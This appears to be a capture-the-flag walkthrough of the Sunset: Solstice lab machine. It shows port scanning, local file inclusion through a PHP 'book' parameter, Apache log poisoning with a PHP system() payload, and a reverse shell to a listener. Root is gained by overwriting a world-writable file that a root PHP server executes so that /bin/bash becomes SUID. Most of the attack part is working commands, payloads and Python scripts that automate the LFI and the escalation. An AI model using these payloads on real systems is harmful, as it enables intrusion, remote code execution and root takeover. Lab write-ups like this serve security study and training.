Sunset: Solstice
Port recognition with nmap
┌──(root@ghost)-[/home/ghost]
└─# nmap --min-rate 5000 -sV -p- solstice.vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-26 11:48 EST
Nmap scan report for solstice.vuln (10.0.2.78)
Host is up (0.000064s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.6
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open smtp Exim smtpd 4.92
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2121/tcp open ftp pyftpdlib 1.5.6
3128/tcp open http-proxy Squid http proxy 4.6
8593/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
54787/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
62524/tcp open ftp FreeFloat ftpd 1.00
MAC Address: 08:00:27:4D:94:A7 (Oracle VirtualBox virtual NIC)
Service Info: Host: solstice; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.63 seconds
nmap reports eleven open TCP ports. Besides Apache on 80 and the FTP, SMB and proxy services, the two PHP CLI development servers on 8593 and 54787 stand out: they run as whatever user started them and have no hardening of their own.
┌──(root@ghost)-[/home/ghost]
└─# curl http://solstice.vuln:8593
<html>
<head>
<link href="https://fonts.googleapis.com/css?family=Comic+Sans" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div class="menu">
<a href="index.php">Main Page</a>
<a href="index.php?book=list">Book List</a>
</div>
We are still setting up the library! Try later on!<p></p> </body>
</html>
Visiting http://solstice.vuln:8593 shows a link to http://solstice.vuln:8593/index.php?book=list. The book parameter apparently names a file that the script includes, so we try to escape the intended directory with a path traversal sequence (../) and check whether the script is vulnerable to local file inclusion.
┌──(root@ghost)-[/home/ghost]
└─# curl http://solstice.vuln:8593/index.php?book=../../../../etc/passwd
<html>
<head>
<link href="https://fonts.googleapis.com/css?family=Comic+Sans" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div class="menu">
<a href="index.php">Main Page</a>
<a href="index.php?book=list">Book List</a>
</div>
We are still setting up the library! Try later on!<p>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
avahi:x:106:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:107:118::/var/lib/saned:/usr/sbin/nologin
colord:x:108:119:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:109:7:HPLIP system user,,,:/var/run/hplip:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash
uuidd:x:112:121::/run/uuidd:/usr/sbin/nologin
smmta:x:113:122:Mail Transfer Agent,,,:/var/lib/sendmail:/usr/sbin/nologin
smmsp:x:114:123:Mail Submission Program,,,:/var/lib/sendmail:/usr/sbin/nologin
Debian-exim:x:115:124::/var/spool/exim4:/usr/sbin/nologin
</p> </body>
</html>
The local file inclusion is confirmed: /etc/passwd is returned verbatim between the page's <p> tags. Besides root, miguel is the only account with a login shell.
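The probe above done as a small script, as an added example that is not the page's lfienum tool: it increases the number of ../ hops until the target file shows up and pulls the included content out of the page's <p>...</p> wrapper (taken from the curl output above; another application needs a different extractor). The fetch callable, the /etc/passwd signature and the target URL are assumptions; fetch is passed in so the same code runs against the live host with requests or offline with a stub.

```python
import re
import urllib.parse

# Added example, not the page's lfienum tool. Probes an include()-style
# parameter (here ?book=) for path traversal by increasing the number of ../
# hops and extracts the included file from the page's <p>...</p> wrapper.
# `fetch` is any callable url -> response body.

PASSWD_SIGNATURE = re.compile(r"^root:x:0:0:", re.M)


def build_url(base, param, depth, target):
    """Build http://host/index.php?book=../../../../etc/passwd with `depth` hops.

    Extra ../ beyond the filesystem root are harmless (/../ is still /), so
    overshooting the depth never breaks a working payload.
    """
    payload = "../" * depth + target.lstrip("/")
    return f"{base}?{param}={urllib.parse.quote(payload, safe='/')}"


def extract_included(html):
    """Return the text the script placed between its <p> and </p> tags."""
    m = re.search(r"<p>(.*?)</p>", html, re.S)
    return m.group(1) if m else ""


def probe(base, param, fetch, target="/etc/passwd", max_depth=8,
          signature=PASSWD_SIGNATURE):
    """Return (depth, content) for the shallowest traversal that reads target.

    `signature` is a regex the included content must match; for /etc/passwd
    the root entry is a reliable marker. Returns (None, "") if no depth up to
    max_depth works.
    """
    for depth in range(1, max_depth + 1):
        content = extract_included(fetch(build_url(base, param, depth, target)))
        if content and signature.search(content):
            return depth, content
    return None, ""


def live_fetch(url):
    """Fetch with requests; only used against the real target."""
    import requests
    return requests.get(url, timeout=5).text


if __name__ == "__main__":
    depth, content = probe("http://solstice.vuln:8593/index.php", "book", live_fetch)
    print(f"traversal depth: {depth}")
    print(content)
```

Once the depth is known, the same build_url() produces the URLs for any other file; the enumeration run below is exactly that loop over a wordlist of known paths.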
┌──(root@ghost)-[/home/ghost]
└─# python3 lfienum "http://solstice.vuln:8593/index.php?book=../../../.." --only-url
> http://solstice.vuln:8593/index.php?book=../../../../etc/passwd
> http://solstice.vuln:8593/index.php?book=../../../../etc/aliases
> http://solstice.vuln:8593/index.php?book=../../../../etc/anacrontab
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/apache2.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/crontab
> http://solstice.vuln:8593/index.php?book=../../../../etc/cups/cupsd.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/fstab
> http://solstice.vuln:8593/index.php?book=../../../../etc/hosts
> http://solstice.vuln:8593/index.php?book=../../../../etc/hosts.allow
> http://solstice.vuln:8593/index.php?book=../../../../etc/hosts.deny
> http://solstice.vuln:8593/index.php?book=../../../../etc/issue
> http://solstice.vuln:8593/index.php?book=../../../../etc/motd
> http://solstice.vuln:8593/index.php?book=../../../../etc/mtab
> http://solstice.vuln:8593/index.php?book=../../../../etc/mysql/my.cnf
> http://solstice.vuln:8593/index.php?book=../../../../etc/network/interfaces
> http://solstice.vuln:8593/index.php?book=../../../../etc/networks
> http://solstice.vuln:8593/index.php?book=../../../../etc/printcap
> http://solstice.vuln:8593/index.php?book=../../../../etc/profile
> http://solstice.vuln:8593/index.php?book=../../../../etc/resolv.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/samba/smb.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/ssh/ssh_config
> http://solstice.vuln:8593/index.php?book=../../../../etc/ssh/sshd_config
> http://solstice.vuln:8593/index.php?book=../../../../proc/cpuinfo
> http://solstice.vuln:8593/index.php?book=../../../../proc/filesystems
> http://solstice.vuln:8593/index.php?book=../../../../proc/interrupts
> http://solstice.vuln:8593/index.php?book=../../../../proc/ioports
> http://solstice.vuln:8593/index.php?book=../../../../proc/meminfo
> http://solstice.vuln:8593/index.php?book=../../../../proc/modules
> http://solstice.vuln:8593/index.php?book=../../../../proc/mounts
> http://solstice.vuln:8593/index.php?book=../../../../proc/sched_debug
> http://solstice.vuln:8593/index.php?book=../../../../proc/stat
> http://solstice.vuln:8593/index.php?book=../../../../proc/swaps
> http://solstice.vuln:8593/index.php?book=../../../../proc/version
> http://solstice.vuln:8593/index.php?book=../../../../proc/self/net/arp
> http://solstice.vuln:8593/index.php?book=../../../../var/log/apache2/access.log
> http://solstice.vuln:8593/index.php?book=../../../../var/log/apache2/error.log
> http://solstice.vuln:8593/index.php?book=../../../../var/log/faillog
> http://solstice.vuln:8593/index.php?book=../../../../var/log/lastlog
> http://solstice.vuln:8593/index.php?book=../../../../var/log/wtmp
> http://solstice.vuln:8593/index.php?book=../../../../var/run/utmp
> http://solstice.vuln:8593/index.php?book=../../../../etc/adduser.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/envvars
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-available/autoindex.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-available/deflate.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-available/dir.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-available/mime.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-available/proxy.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-available/setenvif.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-available/ssl.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-enabled/alias.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-enabled/deflate.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-enabled/dir.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-enabled/mime.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-enabled/negotiation.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-enabled/status.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/ports.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/avahi/avahi-daemon.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/bash.bashrc
> http://solstice.vuln:8593/index.php?book=../../../../etc/bluetooth/input.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/bluetooth/main.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/bluetooth/network.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/ca-certificates.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/debconf.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/debian_version
> http://solstice.vuln:8593/index.php?book=../../../../etc/default/grub
> http://solstice.vuln:8593/index.php?book=../../../../etc/deluser.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/dhcp/dhclient.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/group
> http://solstice.vuln:8593/index.php?book=../../../../etc/group-
> http://solstice.vuln:8593/index.php?book=../../../../etc/hdparm.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/host.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/hostname
> http://solstice.vuln:8593/index.php?book=../../../../etc/issue.net
> http://solstice.vuln:8593/index.php?book=../../../../etc/kernel-img.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/ld.so.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/ldap/ldap.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/login.defs
> http://solstice.vuln:8593/index.php?book=../../../../etc/logrotate.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/mail/sendmail.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/manpath.config
> http://solstice.vuln:8593/index.php?book=../../../../etc/modules
> http://solstice.vuln:8593/index.php?book=../../../../etc/os-release
> http://solstice.vuln:8593/index.php?book=../../../../etc/pam.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/passwd-
> http://solstice.vuln:8593/index.php?book=../../../../etc/pulse/client.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/resolvconf/update-libc.d/sendmail
> http://solstice.vuln:8593/index.php?book=../../../../etc/security/access.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/security/group.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/security/limits.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/security/namespace.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/security/pam_env.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/security/sepermit.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/security/time.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/sensors3.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/sysctl.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/timezone
> http://solstice.vuln:8593/index.php?book=../../../../proc/devices
> http://solstice.vuln:8593/index.php?book=../../../../proc/net/tcp
> http://solstice.vuln:8593/index.php?book=../../../../proc/net/udp
> http://solstice.vuln:8593/index.php?book=../../../../proc/self/cmdline
> http://solstice.vuln:8593/index.php?book=../../../../proc/self/environ
> http://solstice.vuln:8593/index.php?book=../../../../proc/self/mounts
> http://solstice.vuln:8593/index.php?book=../../../../proc/self/stat
> http://solstice.vuln:8593/index.php?book=../../../../proc/self/status
> http://solstice.vuln:8593/index.php?book=../../../../usr/share/adduser/adduser.conf
Enumerating readable files through the local file inclusion with lfienum; every URL listed returned content.
We focus on the Apache logs, /var/log/apache2/access.log and /var/log/apache2/error.log, and check whether they can be poisoned. Apache on port 80 writes each request's User-Agent header into access.log, and the PHP server on 8593 runs as a user that can read that file, so PHP code sent in the User-Agent of a request to http://solstice.vuln:80 is reflected, and executed, when http://solstice.vuln:8593/index.php?book=../../../../var/log/apache2/access.log is included. Two caveats: Apache escapes double quotes in logged headers as \", so the payload must use single quotes only, and because include() parses the whole log, a single logged line with a PHP syntax error makes the include fatal until the log is rotated. Test the payload syntax locally before sending it.
┌──(root@ghost)-[/home/ghost]
└─# cat cmd.py
import requests
# Port 80 is Apache, whose access.log stores the User-Agent verbatim (apart from
# escaping " and \), so the PHP stays single-quoted. $_GET['cmd'] is read from
# the later request that includes the log, not from this one.
headers = { "User-Agent": "<?php system($_GET['cmd']); ?>" }
requests.get("http://solstice.vuln/", headers=headers)
Poisoning the Apache access log through port 80 with cmd.py
┌──(root@ghost)-[/home/ghost]
└─# python3 lfi2rce "http://solstice.vuln:8593/index.php?book=../../../../../" apache 10.0.2.15 1337
lfi2rce - Local File Inclusion To Remote Code Execution v1.0 by 0bfxgh0st*
💀 Poison /var/log/apache2/access.log
💀 Sending payload
listening on [any] 1337 ...
connect to [10.0.2.15] from solstice.vuln [10.0.2.78] 44580
bash: cannot set terminal process group (381): Inappropriate ioctl for device
bash: no job control in this shell
www-data@solstice:/var/tmp/webserver$
lfi2rce automates the same chain: it poisons the access log (already done here with cmd.py), then requests the log through the LFI with a reverse-shell command in the cmd parameter. The listener on 1337 receives a shell as www-data, the user running the PHP server on 8593. Looking around /var/tmp we find a second directory, sv:
www-data@solstice:/var/tmp/sv$ ls -la
total 12
drwsrwxrwx 2 root root 4096 Jun 26 2020 .
drwxrwxrwt 9 root root 4096 Feb 26 13:09 ..
-rwxrwxrwx 1 root root 36 Jun 19 2020 index.php
www-data@solstice:/var/tmp/sv$ cat index.php
<?php
echo "Under construction";
?>
www-data@solstice:/var/tmp/sv$
In /var/tmp/sv we find a root-owned index.php that is world-writable (-rwxrwxrwx), inside a directory that is world-writable as well. If a privileged process executes that file, we can escalate.
www-data@solstice:/var/tmp/sv$ netstat -antp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:8593 0.0.0.0:* LISTEN 399/php
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:57 0.0.0.0:* LISTEN -
...
www-data@solstice:/var/tmp/sv$ curl 127.0.0.1:57
Under construction
www-data@solstice:/var/tmp/sv$
A PHP server bound to 127.0.0.1:57 serves that index.php. netstat shows no PID for it ("-"), so the process is not owned by www-data; a root-owned file served by a listener we cannot inspect is a strong hint that this server runs as root.
www-data@solstice:/var/tmp/sv$ cat index.php
<?php
system('chmod +s /bin/bash');
?>
We overwrite index.php (it is world-writable) with a call that sets the SUID bit on /bin/bash; the server on port 57 executes the file on the next request. curl prints nothing because chmod is silent. bash -p then keeps the effective UID granted by the SUID bit instead of dropping it to the real UID, and the root flag is readable.
www-data@solstice:/var/tmp/sv$ curl 127.0.0.1:57
www-data@solstice:/var/tmp/sv$ bash -p
bash-5.0# cat /root/root.txt
No ascii art for you >:(
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
f950998f0d484a2ef1ea83ed4f42bbca
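The escalation above as a script run on the target as www-data, an added example not taken from the writeup, with the checks a practitioner wants before and after: first have the port-57 server run id to confirm who it actually runs as, and only then drop the SUID bit and verify it on /bin/bash. It assumes what the page showed, a world-writable /var/tmp/sv/index.php served by a PHP process on 127.0.0.1:57 that runs as root. The file path, trigger URL and fetch callable are parameters so the logic can be exercised offline against a temporary file.

```python
import os
import stat
import urllib.request

# Added example, not from the writeup. Assumptions: /var/tmp/sv/index.php is
# world-writable and served by a PHP process on 127.0.0.1:57 that runs as
# root (inferred on the page from netstat hiding the PID).

SERVED_FILE = "/var/tmp/sv/index.php"
TRIGGER_URL = "http://127.0.0.1:57/"


def php_payload(cmd):
    """Single-quoted PHP wrapper; refuse commands that would break the quoting."""
    if "'" in cmd or "\\" in cmd:
        raise ValueError("command must not contain single quotes or backslashes")
    return f"<?php system('{cmd}'); ?>\n"


def http_get(url):
    """Plain stdlib fetch; python-requests may not exist on the target."""
    return urllib.request.urlopen(url, timeout=5).read().decode(errors="replace")


def run_as_server(cmd, path=SERVED_FILE, url=TRIGGER_URL, fetch=http_get):
    """Overwrite the served file with `cmd` and make the server execute it."""
    if not os.access(path, os.W_OK):
        raise PermissionError(f"{path} is not writable")
    with open(path, "w") as f:
        f.write(php_payload(cmd))
    return fetch(url)


def is_setuid_root(path="/bin/bash"):
    """True only if the file is owned by root and carries the SUID bit."""
    st = os.stat(path)
    return st.st_uid == 0 and bool(st.st_mode & stat.S_ISUID)


if __name__ == "__main__":
    # 1. confirm who the server runs as before touching anything else
    print(run_as_server("id"))
    # 2. then set the SUID bit on bash and verify; finish with `bash -p`
    run_as_server("chmod +s /bin/bash")
    print("suid root bash:", is_setuid_root())
```

The id check is cheap and decisive: if the server answered as www-data, overwriting the file would only have defaced it, and the original "Under construction" content should be restored afterwards either way.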